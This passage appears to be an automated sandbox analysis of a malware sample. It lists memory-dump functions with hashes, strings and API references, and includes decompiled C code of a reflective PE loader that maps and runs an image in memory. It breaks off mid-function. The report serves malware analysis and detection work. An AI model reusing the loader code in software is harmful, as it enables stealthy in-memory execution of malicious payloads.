Instruction ID: 33c6f8df4a542bfb56c91a9d6dd9219531aae1bbe1325321f6c1d5bd2a2c258f
Opcode Fuzzy Hash: d96237e08dd5cc9dd469382a20a885bac1911b162f57067d6a7d522da858606b
Instruction Fuzzy Hash: DF9143728093419FD358DF29D58941BFBF1BBC4358F104E1DF6AAA6260D3B19A498F83

Uniqueness

Uniqueness Score: -1.00%

Function 048D90BA, Relevance: 7.9, Strings: 6, Instructions: 381COMMON

Download Yara Rule

Strings

Q( , xrefs: 048D93B3
N?3, xrefs: 048D9570
d4#, xrefs: 048D954A
d, xrefs: 048D9530
6m, xrefs: 048D9264
9L3, xrefs: 048D9461

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 6m$9L3$N?3$Q( $d$d4#
API String ID: 0-2083278446
Opcode ID: fd10281bfbca642dd33f92d09760e59b14da45512a2eb06837b07fff6275a950
Instruction ID: f7501306f166cc5c9a571d8320816e38bab6b649633a8ced2749f3a9c289e309
Opcode Fuzzy Hash: fd10281bfbca642dd33f92d09760e59b14da45512a2eb06837b07fff6275a950
Instruction Fuzzy Hash: B31232B25093809FD368CF65C98AA4BBBE1FBC4758F108E1DE5D986260D7B19909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 048C9384, Relevance: 7.8, Strings: 6, Instructions: 332COMMON

Download Yara Rule

Strings

9E3, xrefs: 048C9566
G=, xrefs: 048C986E
]C, xrefs: 048C95BA
qo9, xrefs: 048C957E
?{, xrefs: 048C955E
\K:, xrefs: 048C946D

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 9E3$?{$G=$\K:$]C$qo9
API String ID: 0-233201734
Opcode ID: 290eefa92661e24ba7a92709faf9dd5b02556bc510e6df0c3876bf8bdeab1a05
Instruction ID: ebd327f9eefbcd3c3ee3fcfcc3fc91aa618e6f5ceed495b9106e69fa12f2a451
Opcode Fuzzy Hash: 290eefa92661e24ba7a92709faf9dd5b02556bc510e6df0c3876bf8bdeab1a05
Instruction Fuzzy Hash: 2A0200B16083409FD368CF25D58A60BBBE2FBC4758F108E1DF19A96260D7B59A49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 048DDEF4, Relevance: 7.7, Strings: 6, Instructions: 247COMMON

Download Yara Rule

Strings

fR, xrefs: 048DE177
,jF, xrefs: 048DE0DA
t\E, xrefs: 048DE306
ep#, xrefs: 048DE001
K,, xrefs: 048DE1D8
t\E, xrefs: 048DE20F

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ,jF$K,$ep#$t\E$t\E$fR
API String ID: 0-1899525808
Opcode ID: 729f837f0024e4ed54b7d85af88c1d66346e49b837e71a328e88b5c5d26eca6b
Instruction ID: 6e3fc2ffb0d3c01d41c5fa88912cfb680232e8e4ac51ff940d5331a64a59928f
Opcode Fuzzy Hash: 729f837f0024e4ed54b7d85af88c1d66346e49b837e71a328e88b5c5d26eca6b
Instruction Fuzzy Hash: EEB124716097809FD358CF66D48941BBBE1FBC8758F408E2EF1969A260D3B5D909CF06

Uniqueness

Uniqueness Score: -1.00%

Function 048D056A, Relevance: 5.3, Strings: 4, Instructions: 267COMMON

Download Yara Rule

Strings

gE", xrefs: 048D06F4
H9I9, xrefs: 048D0816
h.X, xrefs: 048D0660
o%, xrefs: 048D06CA

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID: H9I9$gE"$h.X$o%
API String ID: 2591292051-2007577475
Opcode ID: 497962844b906fba40db0e7e21ebd3cf9e94c533ff1ed4e92d6ca8616010ae3b
Instruction ID: 10433bc976bcf40b5c91b814cfdab4d5c03f4282383aabec663f26f1b9cccd3c
Opcode Fuzzy Hash: 497962844b906fba40db0e7e21ebd3cf9e94c533ff1ed4e92d6ca8616010ae3b
Instruction Fuzzy Hash: 14D13C711093808FD368CF69C58961FFBF1BB89718F108A1DF2AA86260D3B59949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 048C3845, Relevance: 4.0, Strings: 3, Instructions: 235COMMON

Download Yara Rule

Strings

b, xrefs: 048C3A3C
u"2`, xrefs: 048C3918
o:Ha, xrefs: 048C39EC

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: b$o:Ha$u"2`
API String ID: 0-822269544
Opcode ID: e0943309b14714b285cdd57b7e05a600cb4aee9009ec597f36a63046e6bc0583
Instruction ID: fbcee30abb42666b765263b077e179367113377ba10f3a52d6178396c5892515
Opcode Fuzzy Hash: e0943309b14714b285cdd57b7e05a600cb4aee9009ec597f36a63046e6bc0583
Instruction Fuzzy Hash: 83B122729083409FC358CE25C58991BBBE1BBC5718F108E2DF99AA6260D3B5D949CF87

Uniqueness

Uniqueness Score: -1.00%

Function 048DD99A, Relevance: 4.0, Strings: 3, Instructions: 217COMMON

Download Yara Rule

Strings

hIW, xrefs: 048DDA69
., xrefs: 048DDAB5
*^1, xrefs: 048DD9FF

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: *^1$hIW$.
API String ID: 0-1727340660
Opcode ID: a60f4ecc2952d716b42f293b5493a9fe5d6d21fe7675c1b4419a7f1e6ebedc09
Instruction ID: 2a975b6e6b44ef049241b715485d2c08a02efedc825d107d6dfcfaae9892ddd7
Opcode Fuzzy Hash: a60f4ecc2952d716b42f293b5493a9fe5d6d21fe7675c1b4419a7f1e6ebedc09
Instruction Fuzzy Hash: 1AB11DB24083819BC3A8DF25C48A80BFBF1BBC5758F508E1CF59696260D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 048C4C00, Relevance: 4.0, Strings: 3, Instructions: 213COMMON

Download Yara Rule

Strings

' XL, xrefs: 048C4D3F
%%, xrefs: 048C4EB9
hVJ?, xrefs: 048C4DC0

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: %%$' XL$hVJ?
API String ID: 0-594445531
Opcode ID: cc164ebafec800e07fb1784e958b8f6e2b31a23c42e60cd4d6e39d7f3d833cc0
Instruction ID: 90d9d60e7709380ec53721cb6fc4b41615e6bdf6ba8c7da5ae045975d3ecf6d8
Opcode Fuzzy Hash: cc164ebafec800e07fb1784e958b8f6e2b31a23c42e60cd4d6e39d7f3d833cc0
Instruction Fuzzy Hash: 11B10E72D0021DABDF18CFE5D98A8DEBBB2FB08308F208159E511BA264D7B55A59CF50

Uniqueness

Uniqueness Score: -1.00%

Function 048DCAA8, Relevance: 3.9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

JrU, xrefs: 048DCB1C
:N, xrefs: 048DCC18
i\[, xrefs: 048DCC0A

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID: :N$JrU$i\[
API String ID: 963392458-199651125
Opcode ID: b05bd751d8c067dad3d506648693ea0eebc2edd78898b33afc400852eff9c9d4
Instruction ID: 27a5fa54b72bb455515de31ea96a97bad4e74ebc15841e2cd398d19fd79ac3c3
Opcode Fuzzy Hash: b05bd751d8c067dad3d506648693ea0eebc2edd78898b33afc400852eff9c9d4
Instruction Fuzzy Hash: 13613472D0020AEFDF08CFE5D94A9EEBBB6FB48308F208549E511B6260D7B55A15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 048DAEEB, Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

G&7, xrefs: 048DAFEA
qP, xrefs: 048DAF78
>m , xrefs: 048DB014

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: DeleteFile
String ID: >m $G&7$qP
API String ID: 4033686569-395818401
Opcode ID: 373b38d6145d1821f09ef4d898b6b0705562c3245da03ab3fb3681110eb09f12
Instruction ID: 09fd375562ca726c537a8c7af596b23122fbc278aaef3cfab4b9f24815c7d29d
Opcode Fuzzy Hash: 373b38d6145d1821f09ef4d898b6b0705562c3245da03ab3fb3681110eb09f12
Instruction Fuzzy Hash: 2C511F72D01219EBDF08CFE5D98A8EEBBB2FB08314F208149E515BA260D7B55A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 048C2043, Relevance: 2.6, Strings: 2, Instructions: 58COMMON

Download Yara Rule

Strings

J4n, xrefs: 048C20F1
'q4, xrefs: 048C20AB

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: 'q4$J4n
API String ID: 3298025750-1087674265
Opcode ID: dd6d369b6af7bfcc8bd6536940347bc93706b84673d42be7764cf8c905203803
Instruction ID: 73e904e481999fdffa14eb6254747574cbd2a08ed5a35f9476b70eaa16df9bc6
Opcode Fuzzy Hash: dd6d369b6af7bfcc8bd6536940347bc93706b84673d42be7764cf8c905203803
Instruction Fuzzy Hash: 2B21E4B5C0121DABEF45DFA1CA0A4EEBFB1FB10308F208599D51576220D7B51B18DF92

Uniqueness

Uniqueness Score: -1.00%

Function 048C2A46, Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

8r=, xrefs: 048C2C29

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 8r=
API String ID: 0-2421701215
Opcode ID: bdd6d4c6bd650eb9f02fe37ec6153b4132df9d21e4f7cfbca0a3028dd86d1f14
Instruction ID: cd1e0818cd55da3bcdb7b9a82799d6ac8001b6c46546b81593ca1b8a23748d7e
Opcode Fuzzy Hash: bdd6d4c6bd650eb9f02fe37ec6153b4132df9d21e4f7cfbca0a3028dd86d1f14
Instruction Fuzzy Hash: 09A130B25083819FC358CF65D88984BFBF1FBD4358F005A2EF1959A260D7B5DA498B83

Uniqueness

Uniqueness Score: -1.00%

Function 048E08D1, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

S,, xrefs: 048E09A3

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: S,
API String ID: 1029625771-1214237515
Opcode ID: 4196f1e0b2890c2c42c1f139a74c7715c478897bc53fcdf67797d61047a3c847
Instruction ID: 502bc682e6ad31f758e625e54c3d1647b0ff73e4f39c726bc0e0cfcb1a9b6325
Opcode Fuzzy Hash: 4196f1e0b2890c2c42c1f139a74c7715c478897bc53fcdf67797d61047a3c847
Instruction Fuzzy Hash: B541F072D00219EBDF08DFA6D94A4EEBFB1FB48318F2481A9D511B6260C7B51A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 048D7BB2, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bd7bbd5455baa35b3adc3414b0411bf87c5a60660d83f3599a5aea9db5232a0
Instruction ID: 542fe71a6a9676c0f073ee25dd55e2c620e6bf8783d2aea072ac99b0c0c3742b
Opcode Fuzzy Hash: 9bd7bbd5455baa35b3adc3414b0411bf87c5a60660d83f3599a5aea9db5232a0
Instruction Fuzzy Hash: 87213875D01208FFEB48DFE9D84A8AEBBB2EB40344F14C599E525AB280D7B55B11CF80

Uniqueness

Uniqueness Score: -1.00%

Function 10004AE0, Relevance: 21.6, APIs: 4, Strings: 8, Instructions: 612
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E10004AE0(unsigned int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				long _v16;
				void* _v24;
				intOrPtr* _v28;
				void* _v32;
				signed int _v36;
				signed int _v40;
				void* _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr* _v60;
				signed int _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				void* _v104;
				void* _v108;
				void* _v112;
				intOrPtr* _v116;
				intOrPtr _v120;
				signed int _v124;
				void* _v128;
				unsigned int _v132;
				void* _v136;
				intOrPtr* _v140;
				intOrPtr _v172;
				char _v176;
				void* _v184;
				intOrPtr _v188;
				void* _v192;

				_v52 = 0;
				_v112 = 0;
				_v84 = 0;
				_v108 = 0;
				_v24 = 0;
				_v68 = 0;
				_v48 = 0;
				_v184 = 0;
				_v128 = 0;
				_v32 = 0;
				_v104 = 0;
				_v136 = 0;
				_v16 = 0;
				_v76 = 0;
				_v72 = 0;
				_v8 = 1;
				_v52 = E10004960( *0x10095174, "LoadLibraryA");
				_v112 = E10004960( *0x10095174, "GetProcAddress");
				_v84 = E10004960( *0x10095174, "VirtualAlloc");
				_v48 = E10004960( *0x10095174, "VirtualProtect");
				_v24 = E10004960( *0x10095178, "NtFlushInstructionCache");
				_v68 = E10004960( *0x10095174, "GetNativeSystemInfo");
				_v28 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
				if( *_v28 != 0x4550) {
					return 0;
				}
				if(( *(_v28 + 4) & 0x0000ffff) != 0x14c) {
					return 0;
				}
				if(( *(_v28 + 0x38) & 0x00000001) != 0) {
					return 0;
				}
				_v188 = _v28 + ( *(_v28 + 0x14) & 0x0000ffff) + 0x18;
				_v124 =  *(_v28 + 0x38);
				_v80 = 0;
				L8:
				if(_v80 < ( *(_v28 + 6) & 0x0000ffff)) {
					if( *((intOrPtr*)(_v188 + 0x10)) != 0) {
						_v192 =  *((intOrPtr*)(_v188 + 0xc)) +  *((intOrPtr*)(_v188 + 0x10));
					} else {
						_v192 =  *((intOrPtr*)(_v188 + 0xc)) + _v124;
					}
					if(_v192 > _v76) {
						_v76 = _v192;
					}
					_v80 = _v80 + 1;
					_v188 = _v188 + 0x28;
					goto L8;
				}
				_v68( &_v176);
				_v100 =  *(_v28 + 0x50) + _v172 - 0x00000001 &  !(_v172 - 1);
				_t77 = _v172 - 1; // -1
				if(_v100 == (_v76 + _t77 &  !(_v172 - 1))) {
					_v116 = VirtualAlloc(0,  *(_v28 + 0x50), 0x3000, 4);
					_v96 =  *((intOrPtr*)(_v28 + 0x54));
					_v132 = _a4;
					_v12 = _v116;
					_v56 = 0;
					_v92 = 0x3c;
					while(1) {
						_v96 = _v96 - 1;
						if(_v96 == 0) {
							break;
						}
						if((_a8 & 0x00000001) == 0 || _v56 >= _v28 - _a4 || _v56 >= _v92 && _v56 <= _v92 + 2) {
							 *_v12 =  *_v132;
							_v12 = _v12 + 1;
							_v132 = _v132 + 1;
						} else {
							 *_v12 = 0;
							_v12 = _v12 + 1;
							_v132 = _v132 + 1;
						}
						_v56 =  &(_v56[0]);
					}
					_v96 = _v28 + ( *(_v28 + 0x14) & 0x0000ffff) + 0x18;
					_v92 =  *(_v28 + 6) & 0x0000ffff;
					while(1) {
						_v92 = _v92 - 1;
						if(_v92 == 0) {
							break;
						}
						_v132 = _v116 +  *((intOrPtr*)(_v96 + 0xc));
						_v12 = _a4 +  *((intOrPtr*)(_v96 + 0x14));
						_v56 =  *(_v96 + 0x10);
						while(1) {
							_v56 = _v56 - 1;
							if(_v56 == 0) {
								break;
							}
							 *_v132 =  *_v12;
							_v132 = _v132 + 1;
							_v12 = _v12 + 1;
						}
						_v96 = _v96 + 0x28;
					}
					_v132 = _v28 + 0x80;
					_v12 = _v116 +  *_v132;
					while( *((intOrPtr*)(_v12 + 0xc)) != 0) {
						_a4 = LoadLibraryA(_v116 +  *((intOrPtr*)(_v12 + 0xc)));
						_v56 = _v116 +  *_v12;
						_v96 = _v116 +  *((intOrPtr*)(_v12 + 0x10));
						while( *_v96 != 0) {
							if( *_v56 == 0 || _v56 == 0 || ( *_v56 & 0x80000000) == 0) {
								_v132 = _v116 +  *_v96;
								 *_v96 = _v112(_a4, _v132 + 2);
							} else {
								_v120 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
								_v60 = _v120 + 0x78;
								_v120 = _a4 +  *_v60;
								_v140 = _a4 +  *((intOrPtr*)(_v120 + 0x1c));
								_v140 = _v140 + (( *_v56 & 0x0000ffff) -  *((intOrPtr*)(_v120 + 0x10))) * 4;
								 *_v96 = _a4 +  *_v140;
							}
							_v96 = _v96 + 4;
							if(_v56 != 0) {
								_v56 =  &(_v56[1]);
							}
						}
						_v12 = _v12 + 0x14;
					}
					_a4 = _v116 -  *((intOrPtr*)(_v28 + 0x34));
					_v132 = _v28 + 0xa0;
					if( *((intOrPtr*)(_v132 + 4)) == 0) {
						L60:
						_v96 = _v28 + ( *(_v28 + 0x14) & 0x0000ffff) + 0x18;
						_v92 =  *(_v28 + 6) & 0x0000ffff;
						while(1) {
							_v92 = _v92 - 1;
							if(_v92 == 0) {
								break;
							}
							if( *(_v96 + 0x10) <= 0) {
								L99:
								_v96 = _v96 + 0x28;
								continue;
							}
							asm("sbb eax, eax");
							_v40 =  ~( ~( *(_v96 + 0x24) & 0x20000000));
							asm("sbb edx, edx");
							_v88 =  ~( ~( *(_v96 + 0x24) & 0x40000000));
							asm("sbb ecx, ecx");
							_v36 =  ~( ~( *(_v96 + 0x24) & 0x80000000));
							if(_v40 != 0 || _v88 != 0 || _v36 != 0) {
								if(_v40 != 0 || _v88 != 0 || _v36 == 0) {
									if(_v40 != 0 || _v88 == 0 || _v36 != 0) {
										if(_v40 != 0 || _v88 == 0 || _v36 == 0) {
											if(_v40 == 0 || _v88 != 0 || _v36 != 0) {
												if(_v40 == 0 || _v88 != 0 || _v36 == 0) {
													if(_v40 == 0 || _v88 == 0 || _v36 != 0) {
														if(_v40 != 0 && _v88 != 0 && _v36 != 0) {
															_v64 = 0x40;
														}
													} else {
														_v64 = 0x20;
													}
												} else {
													_v64 = 0x80;
												}
											} else {
												_v64 = 0x10;
											}
										} else {
											_v64 = 4;
										}
									} else {
										_v64 = 2;
									}
								} else {
									_v64 = 8;
								}
							} else {
								_v64 = 1;
							}
							if(( *(_v96 + 0x24) & 0x04000000) != 0) {
								_v64 = _v64 | 0x00000200;
							}
							if(VirtualProtect(_v116 +  *((intOrPtr*)(_v96 + 0xc)),  *(_v96 + 0x10), _v64,  &_v16) != 0) {
								goto L99;
							} else {
								return 0;
							}
						}
						_v96 = _v116 +  *((intOrPtr*)(_v28 + 0x28));
						_v24(0xffffffff, 0, 0);
						_v96(0x10000000, 1, 1);
						return _v116;
					}
					_v12 = _v116 +  *_v132;
					while( *((intOrPtr*)(_v12 + 4)) != 0) {
						_v96 = _v116 +  *_v12;
						_v132 =  *((intOrPtr*)(_v12 + 4)) - 8 >> 1;
						_v56 = _v12 + 8;
						while(1) {
							_v132 = _v132 - 1;
							if(_v132 == 0) {
								break;
							}
							if(( *_v56 >> 0x0000000c & 0xf) != 0xa) {
								if(( *_v56 >> 0x0000000c & 0xf) != 3) {
									if(( *_v56 >> 0x0000000c & 0xf) != 1) {
										if(( *_v56 >> 0x0000000c & 0xf) == 2) {
											 *(_v96 + (0x00000fff &  *_v56 & 0x0000ffff)) = ( *(_v96 + (0x00000fff &  *_v56 & 0x0000ffff)) & 0x0000ffff) + (_a4 & 0xffff);
										}
									} else {
										 *(_v96 + (0x00000fff &  *_v56 & 0x0000ffff)) = ( *(_v96 + (0x00000fff &  *_v56 & 0x0000ffff)) & 0x0000ffff) + (_a4 >> 0x00000010 & 0xffff);
									}
								} else {
									 *(_v96 + (0x00000fff &  *_v56 & 0x0000ffff)) =  *(_v96 + (0x00000fff &  *_v56 & 0x0000ffff)) + _a4;
								}
							} else {
								 *(_v96 + (0x00000fff &  *_v56 & 0x0000ffff)) =  *(_v96 + (0x00000fff &  *_v56 & 0x0000ffff)) + _a4;
							}
							_v56 = _v56 + 2;
						}
						_v12 = _v12 +  *((intOrPtr*)(_v12 + 4));
					}
					goto L60;
				}
				return 0;
			}

0x10004ae9
0x10004af0
0x10004af7
0x10004afe
0x10004b05
0x10004b0c
0x10004b13
0x10004b1a
0x10004b24
0x10004b2b
0x10004b32
0x10004b39
0x10004b43
0x10004b4a
0x10004b51
0x10004b58
0x10004b72
0x10004b89
0x10004ba0
0x10004bb6
0x10004bcd
0x10004be4
0x10004bf0
0x10004bfc
0x00000000
0x10004bfe
0x10004c12
0x00000000
0x10004c14
0x10004c24
0x00000000
0x10004c26
0x10004c3b
0x10004c47
0x10004c4a
0x10004c6b
0x10004c75
0x10004c81
0x10004ca9
0x10004c83
0x10004c8f
0x10004c8f
0x10004cb8
0x10004cc0
0x10004cc0
0x10004c59
0x10004c65
0x00000000
0x10004c65
0x10004ccc
0x10004cec
0x10004d03
0x10004d0c
0x10004d28
0x10004d31
0x10004d37
0x10004d3d
0x10004d40
0x10004d47
0x10004d4e
0x10004d57
0x10004d5c
0x00000000
0x00000000
0x10004d64
0x10004da6
0x10004dae
0x10004db7
0x10004d84
0x10004d87
0x10004d90
0x10004d99
0x10004d99
0x10004dc0
0x10004dc0
0x10004dd3
0x10004ddd
0x10004de0
0x10004de9
0x10004dee
0x00000000
0x00000000
0x10004df9
0x10004e05
0x10004e0e
0x10004e11
0x10004e1a
0x10004e1f
0x00000000
0x00000000
0x10004e29
0x10004e31
0x10004e3a
0x10004e3a
0x10004e45
0x10004e45
0x10004e53
0x10004e5e
0x10004e61
0x10004e7b
0x10004e86
0x10004e92
0x10004e95
0x10004ea7
0x10004f23
0x10004f37
0x10004ebb
0x10004ec4
0x10004ecd
0x10004ed8
0x10004ee4
0x10004f03
0x10004f17
0x10004f17
0x10004f3f
0x10004f46
0x10004f4e
0x10004f4e
0x10004f51
0x10004f5c
0x10004f5c
0x10004f6d
0x10004f79
0x10004f83
0x10005122
0x10005130
0x1000513a
0x1000513d
0x10005146
0x1000514b
0x00000000
0x00000000
0x10005158
0x100052b8
0x100052be
0x00000000
0x100052be
0x1000516b
0x1000516f
0x10005180
0x10005184
0x10005195
0x10005199
0x100051a0
0x100051be
0x100051dc
0x100051fa
0x10005215
0x10005230
0x1000524b
0x10005266
0x10005274
0x10005274
0x10005259
0x10005259
0x10005259
0x1000523e
0x1000523e
0x1000523e
0x10005223
0x10005223
0x10005223
0x10005208
0x10005208
0x10005208
0x100051ea
0x100051ea
0x100051ea
0x100051cc
0x100051cc
0x100051cc
0x100051ae
0x100051ae
0x100051ae
0x10005286
0x10005291
0x10005291
0x100052b2
0x00000000
0x100052b4
0x00000000
0x100052b4
0x100052b2
0x100052cf
0x100052d8
0x100052e4
0x00000000
0x100052e7
0x10004f91
0x10004f94
0x10004fa9
0x10004fb7
0x10004fc0
0x10004fc3
0x10004fcc
0x10004fd1
0x00000000
0x00000000
0x10004feb
0x10005031
0x10005077
0x100050ca
0x100050ff
0x100050ff
0x10005079
0x100050b0
0x100050b0
0x10005033
0x1000505b
0x1000505b
0x10004fed
0x10005015
0x10005015
0x10005109
0x10005109
0x1000511a
0x1000511a
0x00000000
0x10004f94
0x00000000

Strings

VirtualAlloc, xrefs: 10004B8C
NtFlushInstructionCache, xrefs: 10004BB9
GetNativeSystemInfo, xrefs: 10004BD0
VirtualProtect, xrefs: 10004BA3
<, xrefs: 10004D47
GetProcAddress, xrefs: 10004B75
@, xrefs: 10005274
LoadLibraryA, xrefs: 10004B5F

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: <$@$GetNativeSystemInfo$GetProcAddress$LoadLibraryA$NtFlushInstructionCache$VirtualAlloc$VirtualProtect
API String ID: 0-1968919357
Opcode ID: f685b8a1b32f5684cfd2076b31d8356765a36801ef04cd330d9ce8fddc6ca6e7
Instruction ID: ed59da4d56335bc5690628ecedff8f91181b20ec39f1a5e1d6ff4a0b43c9a331
Opcode Fuzzy Hash: f685b8a1b32f5684cfd2076b31d8356765a36801ef04cd330d9ce8fddc6ca6e7
Instruction Fuzzy Hash: B0521874D01219DFEB14CF98C890BAEBBB2FF48345F208169E805AB399D735A985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 10028894, Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E10028894(void* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;
				void* _t36;
				long _t38;
				void* _t39;
				void* _t40;
				long _t51;
				signed char* _t53;
				intOrPtr _t56;
				signed int _t57;
				void* _t61;
				signed int _t68;
				void* _t72;

				_t59 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t72 = __ecx;
				_t1 = _t72 + 0x1c; // 0x10094594
				_t34 = _t1;
				_v8 = _t34;
				EnterCriticalSection(_t34);
				_t3 = _t72 + 4; // 0x20
				_t56 =  *_t3;
				_t4 = _t72 + 8; // 0x3
				_t68 =  *_t4;
				if(_t68 >= _t56) {
					L2:
					_t68 = 1;
					if(_t56 <= 1) {
						L7:
						_t13 = _t72 + 0x10; // 0xd61640
						_t35 =  *_t13;
						_t57 = _t56 + 0x20;
						_t83 = _t35;
						if(_t35 != 0) {
							_t36 = GlobalHandle(_t35);
							_v12 = _t36;
							GlobalUnlock(_t36);
							_t38 = E10009B7D(_t59, __eflags, _t57, 8);
							_t61 = 0x2002;
							_t39 = GlobalReAlloc(_v12, _t38, ??);
						} else {
							_t51 = E10009B7D(_t59, _t83, _t57, 8);
							_pop(_t61);
